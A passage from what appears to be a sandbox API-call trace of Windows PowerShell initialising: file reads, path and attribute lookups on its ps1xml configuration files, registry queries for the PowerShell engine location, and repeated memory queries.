lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1b4, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] CloseHandle (hObject=0x32c) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.269] GetLastError () returned 0x0 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2082130 | out: lpFileInformation=0x2082130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0052.270] GetLastError () returned 0x0 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea68 | out: phkResult=0x14ea68*=0x32c) returned 0x0 [0052.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x0, lpcbData=0x14eaac*=0x0 | out: lpType=0x14eab0*=0x1, lpData=0x0, lpcbData=0x14eaac*=0x56) returned 0x0 [0052.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x3175c0, lpcbData=0x14eaac*=0x56 | out: lpType=0x14eab0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eaac*=0x56) returned 0x0 [0052.270] RegCloseKey (hKey=0x32c) returned 0x0 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.476] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.498] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.501] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.502] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.504] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.520] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.524] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.525] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.525] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.526] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.526] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.529] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.529] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.531] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.533] VirtualQuery (in: lpAddress=0x14d9a8, lpBuffer=0x14e9a8, dwLength=0x1c | out: lpBuffer=0x14e9a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.534] VirtualQuery (in: lpAddress=0x14d9a8, lpBuffer=0x14e9a8, dwLength=0x1c | out: lpBuffer=0x14e9a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.534] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.535] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.602] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.602] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.603] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.603] GetLastError () returned 0xcb [0052.612] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.615] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.615] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.616] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.616] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb2c | out: phkResult=0x14eb2c*=0x328) returned 0x0 [0052.616] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb94, lpData=0x0, lpcbData=0x14eb90*=0x0 | out: lpType=0x14eb94*=0x1, lpData=0x0, lpcbData=0x14eb90*=0x74) returned 0x0 [0052.616] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb74, lpData=0x0, lpcbData=0x14eb70*=0x0 | out: lpType=0x14eb74*=0x1, lpData=0x0, lpcbData=0x14eb70*=0x74) returned 0x0 [0052.617] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb74, lpData=0x3175c0, lpcbData=0x14eb70*=0x74 | out: lpType=0x14eb74*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14eb70*=0x74) returned 0x0 [0052.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14eb74 | out: lpFileInformation=0x14eb74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0052.618] GetLastError () returned 0xcb [0052.618] SetErrorMode (uMode=0x1) returned 0x1 [0052.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.618] GetLastError () returned 0xcb [0052.618] SetErrorMode (uMode=0x1) returned 0x1 [0052.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, 